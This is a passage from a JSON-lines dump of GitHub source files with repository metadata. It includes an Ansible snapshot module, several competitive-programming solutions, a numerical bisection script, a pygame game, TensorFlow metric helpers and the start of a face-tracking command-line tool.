client.get_network_domain_by_name(name=network_domain_name, datacenter=datacenter)\n                    network_domain_id = network.get('id')\n                except (KeyError, IndexError, AttributeError, NTTMCPAPIException) as e:\n                    module.fail_json(msg='Could not find the Cloud Network Domain: {0}'.format(e))\n\n                # Check if the Server exists based on the supplied name\n                try:\n                    if server_name is None and server_id is None:\n                        module.fail_json(msg='A valid value for server or server_id is required')\n                    if server_id:\n                        server = client.get_server_by_id(server_id=server_id)\n                    else:\n                        server = client.get_server_by_name(datacenter=datacenter,\n                                                           network_domain_id=network_domain_id,\n                                                           name=server_name)\n                    if not server.get('id'):\n                        raise NTTMCPAPIException('No server found for {0}'.format(server_name or server_id))\n                except (KeyError, IndexError, AttributeError, NTTMCPAPIException) as e:\n                    module.fail_json(msg='Could not locate any existing server - {0}'.format(e))\n\n                if module.check_mode:\n                    if server.get('snapshotService'):\n                        module.exit_json(msg='A Snapshot will be taken for server ID: {0}'.format(server.get('id')))\n                    else:\n                        module.warn(warning='Snapshots are not enabled for server ID: {0}'.format(server.get('id')))\n                        module.exit_json(msg='No Snapshot can be taken')\n\n                # Take the snapshot\n                result = client.manual_snapshot(server.get('id'), module.params.get('description'))\n\n            if result:\n                module.exit_json(changed=True, data=result)\n            module.fail_json(msg='Could not ascertain the status of the manual snapshot. Check manually')\n        elif state == 'absent':\n            if module.params.get('id') is None:\n                module.fail_json(msg='Argument \"id\" is required when deleting a manual snapshot')\n            if module.check_mode:\n                module.exit_json(msg='Snapshot with ID {0} will be deleted'.format(module.params.get('id')))\n            if client.delete_snapshot(module.params.get('id')):\n                module.exit_json(changed=True, msg='The manual snapshot was successfully deleted')\n            module.fail_json(msg='Could not ascertain the status of the snapshot deletion. 
Check manually')\n\n except (KeyError, IndexError, AttributeError, NTTMCPAPIException) as e:\n module.fail_json(msg='Could not initiate a manual Snapshot: {0}'.format(e))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nttmcp/mcp_ansible_collection","sub_path":"plugins/modules/snapshot.py","file_name":"snapshot.py","file_ext":"py","file_size_in_byte":8984,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"4293228096","text":"def kouyaku(a: int, b: int) -> int:\n\n if b == 0:\n return a\n else:\n return kouyaku(b, a % b)\n\n\nN = int(input())\n\nts = []\nfor _ in range(N):\n ts.append(int(input()))\n\nans = 1\nfor t in ts:\n ans = ans * t // kouyaku(ans, t)\n\nprint(ans)\n","repo_name":"murakami10/atc_python","sub_path":"not_solved/re_solve/03/abc70_c.py","file_name":"abc70_c.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21358399728","text":"from collections import deque # fifo, lilo 모두 구현 가능. list 보다 빠르게 설계\r\nimport sys\r\n\r\ninput = sys.stdin.readline\r\n\r\ndef solution():\r\n for _ in range(int(input())):\r\n N, M = map(int, input().split())\r\n rank_lst = list(map(int, input().split())) # 중요도 리스트\r\n rank_tup = deque([(rank, idx) for idx, rank in enumerate(rank_lst)]) # (중요도, 인덱스) 큐\r\n\r\n count = 0 # 출력 번호\r\n while True:\r\n maxTuple = max(rank_tup, key= lambda x:x[0]) # 최대 rank(중요도) 포함 튜플 \r\n if rank_tup[0][0] == maxTuple[0]: # 첫 원소의 우선순위가 최대라면\r\n if rank_tup[0][1] == M: # 최대값 인덱스가 맨 첫 원소 인덱스와 같다면 \r\n count += 1\r\n break\r\n else: \r\n rank_tup.popleft()\r\n count += 1\r\n else:\r\n rank_tup.append(rank_tup.popleft())\r\n print(count)\r\n \r\nsolution()","repo_name":"Yeonny0723/TIL_algorithm","sub_path":"백준/Silver/1966. 
프린터 큐/프린터 큐.py","file_name":"프린터 큐.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37887134311","text":"import numpy as np \n\n\ndef f(x):\n    y=x**3-7*x**2+14*x-6\n    return y \n\n\n\ndef bissec(a,b,erro):\n    # compute the required number of iterations\n    n=(np.log(b-a)- np.log(erro))/np.log(2)\n    # ceil rounds up to the next whole number\n    n=np.ceil(n)\n    i=0\n    print(\"=\"*40)\n    print(\"Valor das iterações\")\n    print(\"=\"*40)\n    while i<n:\n        if f(a)*f(b) > 0: \n            print(\"Não podemos afirmar se há raizes nesse intervalo\")\n        else:\n            # create the midpoint m=(a+b)/2\n            m=(a+b)/2\n            m=round(m,6)\n            if f(a)*f(m)<0:\n                b=m\n            else:\n                a=m\n            print(f'Valor de x_{i+1} = {m}')\n            i+=1\n    print()\n    return print(f'O valor aproximado da raiz é:{m}')\n\nbissec(0,1,0.01)","repo_name":"YuriMenezesIF/UFS-programacao","sub_path":"python/Calculo Numerico/metodoBisseccao.py","file_name":"metodoBisseccao.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13713207377","text":"import json\n\n\ndef process_user(data: dict, _user):\n    if 'user' in data:\n        _user.put(json.dumps(data['user']))\n        data.pop('user')\n\n    for val in data.values():\n        if isinstance(val, list):\n            for element in val:\n                if isinstance(element, dict):\n                    process_user(element, _user)\n\n\ndef parse(response, data_holder, logger):\n    body = response.text\n\n    if len(body) < 13_000:\n        # if the size of the data is too small, it means it has not been updated\n        # the default empty size seems to be 640\n        # so I decided 12434 could be a good value, allowing for small changes due to the build tag\n        logger.warning(f\"EMPTY - {response.url}\")\n        return\n\n    raw_json = body.split('')[0]\n    data = json.loads(raw_json)['props']['initialState']['question']\n\n    process_user(data, data_holder['users'])\n    data_holder['questions'].put(json.dumps(data))\n\n    logger.info(f\"SUCCESS - {response.url}\")\n    return\n","repo_name":"sunfoxy2k/Distributed-Crawler","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37149426025","text":"import pygame\nimport math\nimport random\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\npygame.init()\n\n# Set the width and height of the screen [width, height]\nsize = (700, 500)\ndisplay = pygame.display.set_mode(size)\n\nfont = pygame.font.SysFont(\"Verdana\",25)\n\npygame.display.set_caption(\"My Game\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\n#Loading images\nsanta_img = pygame.image.load('santa.png').convert()\nsanta_main_img = pygame.transform.scale(santa_img,(64,64))\nsanta_main_img.set_colorkey(BLACK)\n\ngifts = []\ngift_speed = 2\n\ngift_1 = pygame.image.load('gift_1.png').convert()\ngift_1 = pygame.transform.scale(gift_1,(32,32))\ngift_1.set_colorkey(BLACK)\ngifts.append(gift_1)\n\ngift_2 = pygame.image.load('gift_2.png').convert()\ngift_2 = pygame.transform.scale(gift_2,(32,32))\ngift_2.set_colorkey(BLACK)\ngifts.append(gift_2)\n\ngift_3 = pygame.image.load('gift_3.png').convert()\ngift_3 = pygame.transform.scale(gift_3,(32,32))\ngift_3.set_colorkey(BLACK)\ngifts.append(gift_3)\n\nbackground = pygame.image.load('background.png').convert()\n#End of loading 
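\n# Illustrative sketch (not in the original): the repeated load/scale/colorkey steps\n# above could be factored into a helper, assuming the same sprite sizes used here:\n#   def load_sprite(path, size=(32, 32)):\n#       img = pygame.transform.scale(pygame.image.load(path).convert(), size)\n#       img.set_colorkey(BLACK)\n#       return img\n#   gift_1 = load_sprite('gift_1.png')\n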
images\n\n#Classes\n\nclass Santa(pygame.sprite.Sprite):\n def __init__(self, x, y, size):\n super().__init__()\n self.size = size\n self.image = pygame.Surface([self.size,self.size])\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.speed = 5\n\n self.score = 0\n\n self.change_x = 0\n self.change_y = 0\n\n def changespeed(self, x):\n\n self.change_x += x\n\n\n def update(self,display):\n\n display.blit(santa_main_img,(self.rect.x,self.rect.y))\n\n self.rect.x += self.change_x\n\n img = font.render('Score: '+ str(self.score), True, GREEN)\n display.blit(img,(0,0))\n\n\n\n\nclass Gift(pygame.sprite.Sprite):\n def __init__(self, x, y, size):\n super().__init__()\n self.size = size\n self.image = pygame.Surface([self.size,self.size])\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.speed = gift_speed\n\n self.type = random.randint(0,2)\n\n def update(self,display):\n \n display.blit(gifts[self.type],(self.rect.x,self.rect.y))\n self.rect.y += self.speed\n\n if self.rect.y > 440:\n all_sprites_group.remove(self)\n\n\n\nclass Snow(pygame.sprite.Sprite):\n def __init__(self, width,height):\n super().__init__()\n self.size = size\n self.image = pygame.Surface([width,height]) \n self.image.fill(WHITE) \n self.rect = self.image.get_rect()\n\n self.rect.x = random.randrange(0, 700) \n self.rect.y = random.randrange(-50, 50) \n\n self.speed = 1\n\n def update(self,display):\n \n self.rect.y += self.speed\n\n if self.rect.y > 440:\n all_sprites_group.remove(self)\n snow_group.remove(self)\n self.kill()\n\n\nall_sprites_group = pygame.sprite.Group() \nsanta_group = pygame.sprite.Group() \ngift_group = pygame.sprite.Group() \nsnow_group = pygame.sprite.Group() \n\n\nmysanta = Santa(300,400,64)\nall_sprites_group.add(mysanta)\nsanta_group.add(mysanta)\n\n\nindex = 0\ndiff = 0\n\n\n# -------- Main Program Loop -----------\nwhile not done:\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n # Set the speed based on the key pressed\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n mysanta.changespeed(-3)\n elif event.key == pygame.K_RIGHT:\n mysanta.changespeed(3)\n \n # Reset speed when key goes up\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n mysanta.changespeed(3)\n elif event.key == pygame.K_RIGHT:\n mysanta.changespeed(-3)\n\n\n diff += 1\n index += 1\n if index > 75:\n mygift = Gift(random.randint(0,700),0,32)\n all_sprites_group.add(mygift)\n gift_group.add(mygift)\n index = 0\n \n #gifts fall faster after some time\n if diff > 1000:\n gift_speed += 1\n diff = 0\n\n display.blit(background,(0,0))\n\n santa_gift_list = pygame.sprite.groupcollide(santa_group , gift_group, False, True)\n for gift in santa_gift_list:\n mysanta.score += 1\n\n\n size = random.randint(2,4)\n my_snow = Snow(size, size) \n snow_group.add (my_snow) \n all_sprites_group.add (my_snow) \n \n\n # --- Drawing code should go here\n\n all_sprites_group.update(display)\n snow_group.draw(display)\n\n pygame.display.flip()\n \n \n clock.tick(60)\n pygame.display.update()\n\n\npygame.quit()\n","repo_name":"Lazar-Djukovic/Lazar-Djukovic_Classwork_Prep","sub_path":"Christmas2022/Christmas2022.py","file_name":"Christmas2022.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8749264132","text":"def dislplayArguments(argument1, *argument2, **argument3):\n print(argument1) \n for 
arg in argument2: \n print(arg) \n for arg in argument3.items(): \n print(arg) \n \narg1 = \"Welcome\"\narg3 = \"Golang\"\ndislplayArguments(arg1, \"to\", arg3, agr4 = 4,arg5 =\"Golang !\") \n ","repo_name":"sagarsmn331/Tutree-task","sub_path":"p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1750973744","text":"from tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import confusion_matrix\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import state_ops\nfrom tensorflow.python.ops import variable_scope\nimport numpy as np\n\ndef metric_variable(shape, dtype, validate_shape=True, name=None):\n \"\"\"Create variable in `GraphKeys.(LOCAL|METRIC_VARIABLES)` collections.\n If running in a `DistributionStrategy` context, the variable will be\n \"tower local\". This means:\n * The returned object will be a container with separate variables\n per replica/tower of the model.\n * When writing to the variable, e.g. using `assign_add` in a metric\n update, the update will be applied to the variable local to the\n replica/tower.\n * To get a metric's result value, we need to sum the variable values\n across the replicas/towers before computing the final answer.\n Furthermore, the final answer should be computed once instead of\n in every replica/tower. Both of these are accomplished by\n running the computation of the final result value inside\n `tf.contrib.distribution_strategy_context.get_tower_context(\n ).merge_call(fn)`.\n Inside the `merge_call()`, ops are only added to the graph once\n and access to a tower-local variable in a computation returns\n the sum across all replicas/towers.\n Args:\n shape: Shape of the created variable.\n dtype: Type of the created variable.\n validate_shape: (Optional) Whether shape validation is enabled for\n the created variable.\n name: (Optional) String name of the created variable.\n Returns:\n A (non-trainable) variable initialized to zero, or if inside a\n `DistributionStrategy` scope a tower-local variable container.\n \"\"\"\n # Note that synchronization \"ON_READ\" implies trainable=False.\n return variable_scope.variable(\n lambda: array_ops.zeros(shape, dtype),\n collections=[\n ops.GraphKeys.LOCAL_VARIABLES, ops.GraphKeys.METRIC_VARIABLES\n ],\n validate_shape=validate_shape,\n synchronization=variable_scope.VariableSynchronization.ON_READ,\n aggregation=variable_scope.VariableAggregation.SUM,\n name=name)\n\ndef streaming_confusion_matrix(labels, predictions, num_classes, weights=None):\n \"\"\"Calculate a streaming confusion matrix.\n Calculates a confusion matrix. For estimation over a stream of data,\n the function creates an `update_op` operation.\n Args:\n labels: A `Tensor` of ground truth labels with shape [batch size] and of\n type `int32` or `int64`. The tensor will be flattened if its rank > 1.\n predictions: A `Tensor` of prediction results for semantic labels, whose\n shape is [batch size] and type `int32` or `int64`. The tensor will be\n flattened if its rank > 1.\n num_classes: The possible number of labels the prediction task can\n have. 
This value must be provided, since a confusion matrix of\n dimension = [num_classes, num_classes] will be allocated.\n weights: Optional `Tensor` whose rank is either 0, or the same rank as\n `labels`, and must be broadcastable to `labels` (i.e., all dimensions must\n be either `1`, or the same as the corresponding `labels` dimension).\n Returns:\n total_cm: A `Tensor` representing the confusion matrix.\n update_op: An operation that increments the confusion matrix.\n \"\"\"\n # Local variable to accumulate the predictions in the confusion matrix.\n total_cm = metric_variable(\n [num_classes, num_classes], dtypes.float64, name='total_confusion_matrix')\n\n # Cast the type to int64 required by confusion_matrix_ops.\n predictions = math_ops.to_int64(predictions)\n labels = math_ops.to_int64(labels)\n num_classes = math_ops.to_int64(num_classes)\n\n # Flatten the input if its rank > 1.\n if predictions.get_shape().ndims > 1:\n predictions = array_ops.reshape(predictions, [-1])\n\n if labels.get_shape().ndims > 1:\n labels = array_ops.reshape(labels, [-1])\n\n if (weights is not None) and (weights.get_shape().ndims > 1):\n weights = array_ops.reshape(weights, [-1])\n\n # Accumulate the prediction to current confusion matrix.\n current_cm = confusion_matrix.confusion_matrix(\n labels, predictions, num_classes, weights=weights, dtype=dtypes.float64)\n update_op = state_ops.assign_add(total_cm, current_cm)\n return (total_cm, update_op)\n\n\ndef calculate(total_cm, num_class):\n precisions = []\n recalls = []\n fs = []\n for i in range(num_class):\n rowsum, colsum = np.sum(total_cm[i]), np.sum(total_cm[r][i] for r in range(num_class))\n precision = total_cm[i][i] / float(colsum+1e-12)\n recall = total_cm[i][i] / float(rowsum+1e-12)\n f = 2 * precision * recall / (precision + recall+1e-12)\n precisions.append(precision)\n recalls.append(recall)\n fs.append(f)\n return np.mean(precisions), np.mean(recalls), np.mean(fs)\n","repo_name":"kyzhouhzau/BERT-NER","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","stars":1212,"dataset":"github-code","pt":"60"} +{"seq_id":"4837194517","text":"# 에디터\n# 초기에 편집기에 입력되어 있는 문자열이 주어지고, 그 이후 입력한 명령어가 차례로 주어졌을 때,\n# 모든 명령어를 수행하고 난 후 편집기에 입력되어 있는 문자열을 구하는 프로그램을 작성하시오.\n# 단, 명령어가 수행되기 전에 커서는 문장의 맨 뒤에 위치하고 있다고 한다.\n'''\nL\t커서를 왼쪽으로 한 칸 옮김 (커서가 문장의 맨 앞이면 무시됨)\nD\t커서를 오른쪽으로 한 칸 옮김 (커서가 문장의 맨 뒤이면 무시됨)\nB\t커서 왼쪽에 있는 문자를 삭제함 (커서가 문장의 맨 앞이면 무시됨)\n삭제로 인해 커서는 한 칸 왼쪽으로 이동한 것처럼 나타나지만, 실제로 커서의 오른쪽에 있던 문자는 그대로임\nP $\t$라는 문자를 커서 왼쪽에 추가함\n'''\n\nleft_str = list(input()) # 초기에 편집기에 입력되어 있는 문자열\nright_str = [] # 커서의 오른쪽에 위치하는 문자열\nN = int(input()) # 입력할 명령어의 개수\n\nfor _ in range(N):\n cmd = input().split()\n\n if cmd[0] == 'L':\n if len(left_str) == 0:\n continue\n c = left_str.pop()\n right_str.append(c)\n elif cmd[0] == 'D':\n if len(right_str) == 0:\n continue\n c = right_str.pop()\n left_str.append(c)\n elif cmd[0] == 'B':\n if len(left_str) == 0:\n continue\n left_str.pop()\n elif cmd[0] == 'P':\n left_str.append(cmd[1])\n\nwhile left_str:\n c = left_str.pop()\n right_str.append(c)\n\noutput = ''\n\nwhile right_str:\n output += right_str.pop()\n\nprint(output)\n\n# 시간초과.....\n","repo_name":"lets-code-together/lets-code-together","sub_path":"AlgorithmsBasic/2-DataStructure1/1406_3.py","file_name":"1406_3.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39705066070","text":"import 
copy\nimport os\nimport sys\nimport argparse\nimport traceback\nimport gc\n\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument(\"-i\", \"--ip\", help=\"Set IP address for sending tracking data\", default=\"127.0.0.1\")\nparser.add_argument(\"-p\", \"--port\", type=int, help=\"Set port for sending tracking data\", default=11573)\nif os.name == 'nt':\n parser.add_argument(\"-l\", \"--list-cameras\", type=int, help=\"Set this to 1 to list the available cameras and quit, set this to 2 or higher to output only the names\", default=0)\n parser.add_argument(\"-a\", \"--list-dcaps\", type=int, help=\"Set this to -1 to list all cameras and their available capabilities, set this to a camera id to list that camera's capabilities\", default=None)\n parser.add_argument(\"-W\", \"--width\", type=int, help=\"Set camera and raw RGB width\", default=640)\n parser.add_argument(\"-H\", \"--height\", type=int, help=\"Set camera and raw RGB height\", default=360)\n parser.add_argument(\"-D\", \"--dcap\", type=int, help=\"Set which device capability line to use or -1 to use the default camera settings (FPS still need to be set separately)\", default=None)\n parser.add_argument(\"-B\", \"--blackmagic\", type=int, help=\"When set to 1, special support for Blackmagic devices is enabled\", default=0)\nelse:\n parser.add_argument(\"-W\", \"--width\", type=int, help=\"Set raw RGB width\", default=640)\n parser.add_argument(\"-H\", \"--height\", type=int, help=\"Set raw RGB height\", default=360)\nparser.add_argument(\"-F\", \"--fps\", type=int, help=\"Set camera frames per second\", default=24)\nparser.add_argument(\"-c\", \"--capture\", help=\"Set camera ID (0, 1...) or video file\", default=\"0\")\nparser.add_argument(\"-M\", \"--mirror-input\", action=\"store_true\", help=\"Process a mirror image of the input video\")\nparser.add_argument(\"-m\", \"--max-threads\", type=int, help=\"Set the maximum number of threads\", default=1)\nparser.add_argument(\"-t\", \"--threshold\", type=float, help=\"Set minimum confidence threshold for face tracking\", default=None)\nparser.add_argument(\"-d\", \"--detection-threshold\", type=float, help=\"Set minimum confidence threshold for face detection\", default=0.6)\nparser.add_argument(\"-v\", \"--visualize\", type=int, help=\"Set this to 1 to visualize the tracking, to 2 to also show face ids, to 3 to add confidence values or to 4 to add numbers to the point display\", default=0)\nparser.add_argument(\"-P\", \"--pnp-points\", type=int, help=\"Set this to 1 to add the 3D fitting points to the visualization\", default=0)\nparser.add_argument(\"-s\", \"--silent\", type=int, help=\"Set this to 1 to prevent text output on the console\", default=0)\nparser.add_argument(\"--faces\", type=int, help=\"Set the maximum number of faces (slow)\", default=1)\nparser.add_argument(\"--scan-retinaface\", type=int, help=\"When set to 1, scanning for additional faces will be performed using RetinaFace in a background thread, otherwise a simpler, faster face detection mechanism is used. 
When the maximum number of faces is 1, this option does nothing.\", default=0)\nparser.add_argument(\"--scan-every\", type=int, help=\"Set after how many frames a scan for new faces should run\", default=3)\nparser.add_argument(\"--discard-after\", type=int, help=\"Set the how long the tracker should keep looking for lost faces\", default=10)\nparser.add_argument(\"--max-feature-updates\", type=int, help=\"This is the number of seconds after which feature min/max/medium values will no longer be updated once a face has been detected.\", default=900)\nparser.add_argument(\"--no-3d-adapt\", type=int, help=\"When set to 1, the 3D face model will not be adapted to increase the fit\", default=1)\nparser.add_argument(\"--try-hard\", type=int, help=\"When set to 1, the tracker will try harder to find a face\", default=0)\nparser.add_argument(\"--video-out\", help=\"Set this to the filename of an AVI file to save the tracking visualization as a video\", default=None)\nparser.add_argument(\"--video-scale\", type=int, help=\"This is a resolution scale factor applied to the saved AVI file\", default=1, choices=[1,2,3,4])\nparser.add_argument(\"--video-fps\", type=float, help=\"This sets the frame rate of the output AVI file\", default=24)\nparser.add_argument(\"--raw-rgb\", type=int, help=\"When this is set, raw RGB frames of the size given with \\\"-W\\\" and \\\"-H\\\" are read from standard input instead of reading a video\", default=0)\nparser.add_argument(\"--log-data\", help=\"You can set a filename to which tracking data will be logged here\", default=\"\")\nparser.add_argument(\"--log-output\", help=\"You can set a filename to console output will be logged here\", default=\"\")\nparser.add_argument(\"--model\", type=int, help=\"This can be used to select the tracking model. Higher numbers are models with better tracking quality, but slower speed, except for model 4, which is wink optimized. Models 1 and 0 tend to be too rigid for expression and blink detection. Model -2 is roughly equivalent to model 1, but faster. 
Model -3 is between models 0 and -1.\", default=3, choices=[-3, -2, -1, 0, 1, 2, 3, 4])\nparser.add_argument(\"--model-dir\", help=\"This can be used to specify the path to the directory containing the .onnx model files\", default=None)\nparser.add_argument(\"--gaze-tracking\", type=int, help=\"When set to 1, gaze tracking is enabled, which makes things slightly slower\", default=1)\nparser.add_argument(\"--face-id-offset\", type=int, help=\"When set, this offset is added to all face ids, which can be useful for mixing tracking data from multiple network sources\", default=0)\nparser.add_argument(\"--repeat-video\", type=int, help=\"When set to 1 and a video file was specified with -c, the tracker will loop the video until interrupted\", default=0)\nparser.add_argument(\"--dump-points\", type=str, help=\"When set to a filename, the current face 3D points are made symmetric and dumped to the given file when quitting the visualization with the \\\"q\\\" key\", default=\"\")\nparser.add_argument(\"--benchmark\", type=int, help=\"When set to 1, the different tracking models are benchmarked, starting with the best and ending with the fastest and with gaze tracking disabled for models with negative IDs\", default=0)\nif os.name == 'nt':\n parser.add_argument(\"--use-dshowcapture\", type=int, help=\"When set to 1, libdshowcapture will be used for video input instead of OpenCV\", default=1)\n parser.add_argument(\"--blackmagic-options\", type=str, help=\"When set, this additional option string is passed to the blackmagic capture library\", default=None)\n parser.add_argument(\"--priority\", type=int, help=\"When set, the process priority will be changed\", default=None, choices=[0, 1, 2, 3, 4, 5])\nargs = parser.parse_args()\n\nos.environ[\"OMP_NUM_THREADS\"] = str(args.max_threads)\n\nclass OutputLog(object):\n def __init__(self, fh, output):\n self.fh = fh\n self.output = output\n def write(self, buf):\n if self.fh is not None:\n self.fh.write(buf)\n self.output.write(buf)\n self.flush()\n def flush(self):\n if self.fh is not None:\n self.fh.flush()\n self.output.flush()\noutput_logfile = None\nif args.log_output != \"\":\n output_logfile = open(args.log_output, \"w\")\nsys.stdout = OutputLog(output_logfile, sys.stdout)\nsys.stderr = OutputLog(output_logfile, sys.stderr)\n\nif os.name == 'nt':\n import dshowcapture\n if args.blackmagic == 1:\n dshowcapture.set_bm_enabled(True)\n if args.blackmagic_options is not None:\n dshowcapture.set_options(args.blackmagic_options)\n if args.priority is not None:\n import psutil\n classes = [psutil.IDLE_PRIORITY_CLASS, psutil.BELOW_NORMAL_PRIORITY_CLASS, psutil.NORMAL_PRIORITY_CLASS, psutil.ABOVE_NORMAL_PRIORITY_CLASS, psutil.HIGH_PRIORITY_CLASS, psutil.REALTIME_PRIORITY_CLASS]\n p = psutil.Process(os.getpid())\n p.nice(classes[args.priority])\n\nif os.name == 'nt' and (args.list_cameras > 0 or args.list_dcaps is not None):\n cap = dshowcapture.DShowCapture()\n info = cap.get_info()\n unit = 10000000.;\n if args.list_dcaps is not None:\n formats = {0: \"Any\", 1: \"Unknown\", 100: \"ARGB\", 101: \"XRGB\", 200: \"I420\", 201: \"NV12\", 202: \"YV12\", 203: \"Y800\", 300: \"YVYU\", 301: \"YUY2\", 302: \"UYVY\", 303: \"HDYC (Unsupported)\", 400: \"MJPEG\", 401: \"H264\" }\n for cam in info:\n if args.list_dcaps == -1:\n type = \"\"\n if cam['type'] == \"Blackmagic\":\n type = \"Blackmagic: \"\n print(f\"{cam['index']}: {type}{cam['name']}\")\n if args.list_dcaps != -1 and args.list_dcaps != cam['index']:\n continue\n for caps in cam['caps']:\n format = 
caps['format']\n if caps['format'] in formats:\n format = formats[caps['format']]\n if caps['minCX'] == caps['maxCX'] and caps['minCY'] == caps['maxCY']:\n print(f\" {caps['id']}: Resolution: {caps['minCX']}x{caps['minCY']} FPS: {unit/caps['maxInterval']:.3f}-{unit/caps['minInterval']:.3f} Format: {format}\")\n else:\n print(f\" {caps['id']}: Resolution: {caps['minCX']}x{caps['minCY']}-{caps['maxCX']}x{caps['maxCY']} FPS: {unit/caps['maxInterval']:.3f}-{unit/caps['minInterval']:.3f} Format: {format}\")\n else:\n if args.list_cameras == 1:\n print(\"Available cameras:\")\n for cam in info:\n type = \"\"\n if cam['type'] == \"Blackmagic\":\n type = \"Blackmagic: \"\n if args.list_cameras == 1:\n print(f\"{cam['index']}: {type}{cam['name']}\")\n else:\n print(f\"{type}{cam['name']}\")\n cap.destroy_capture()\n sys.exit(0)\n\nimport numpy as np\nimport time\nimport cv2\nimport socket\nimport struct\nimport json\nfrom input_reader import InputReader, VideoReader, DShowCaptureReader, try_int\nfrom tracker import Tracker, get_model_base_path\n\nif args.benchmark > 0:\n model_base_path = get_model_base_path(args.model_dir)\n im = cv2.imread(os.path.join(model_base_path, \"benchmark.bin\"), cv2.IMREAD_COLOR)\n results = []\n for model_type in [3, 2, 1, 0, -1, -2, -3]:\n tracker = Tracker(224, 224, threshold=0.1, max_threads=args.max_threads, max_faces=1, discard_after=0, scan_every=0, silent=True, model_type=model_type, model_dir=args.model_dir, no_gaze=(model_type == -1), detection_threshold=0.1, use_retinaface=0, max_feature_updates=900, static_model=True if args.no_3d_adapt == 1 else False)\n tracker.detected = 1\n tracker.faces = [(0, 0, 224, 224)]\n total = 0.0\n for i in range(100):\n start = time.perf_counter()\n r = tracker.predict(im)\n total += time.perf_counter() - start\n print(1. 
/ (total / 100.))\n sys.exit(0)\n\ntarget_ip = args.ip\ntarget_port = args.port\n\nif args.faces >= 40:\n print(\"Transmission of tracking data over network is not supported with 40 or more faces.\")\n\nfps = args.fps\ndcap = None\nuse_dshowcapture_flag = False\nif os.name == 'nt':\n dcap = args.dcap\n use_dshowcapture_flag = True if args.use_dshowcapture == 1 else False\n input_reader = InputReader(args.capture, args.raw_rgb, args.width, args.height, fps, use_dshowcapture=use_dshowcapture_flag, dcap=dcap)\n if args.dcap == -1 and type(input_reader) == DShowCaptureReader:\n fps = min(fps, input_reader.device.get_fps())\nelse:\n input_reader = InputReader(args.capture, args.raw_rgb, args.width, args.height, fps)\nif type(input_reader.reader) == VideoReader:\n fps = 0\n\nlog = None\nout = None\nfirst = True\nheight = 0\nwidth = 0\ntracker = None\nsock = None\ntotal_tracking_time = 0.0\ntracking_time = 0.0\ntracking_frames = 0\nframe_count = 0\n\nfeatures = [\"eye_l\", \"eye_r\", \"eyebrow_steepness_l\", \"eyebrow_updown_l\", \"eyebrow_quirk_l\", \"eyebrow_steepness_r\", \"eyebrow_updown_r\", \"eyebrow_quirk_r\", \"mouth_corner_updown_l\", \"mouth_corner_inout_l\", \"mouth_corner_updown_r\", \"mouth_corner_inout_r\", \"mouth_open\", \"mouth_wide\"]\n\nif args.log_data != \"\":\n log = open(args.log_data, \"w\")\n log.write(\"Frame,Time,Width,Height,FPS,Face,FaceID,RightOpen,LeftOpen,AverageConfidence,Success3D,PnPError,RotationQuat.X,RotationQuat.Y,RotationQuat.Z,RotationQuat.W,Euler.X,Euler.Y,Euler.Z,RVec.X,RVec.Y,RVec.Z,TVec.X,TVec.Y,TVec.Z\")\n for i in range(66):\n log.write(f\",Landmark[{i}].X,Landmark[{i}].Y,Landmark[{i}].Confidence\")\n for i in range(66):\n log.write(f\",Point3D[{i}].X,Point3D[{i}].Y,Point3D[{i}].Z\")\n for feature in features:\n log.write(f\",{feature}\")\n log.write(\"\\r\\n\")\n log.flush()\n\nis_camera = args.capture == str(try_int(args.capture))\n\ntry:\n attempt = 0\n frame_time = time.perf_counter()\n target_duration = 0\n if fps > 0:\n target_duration = 1. 
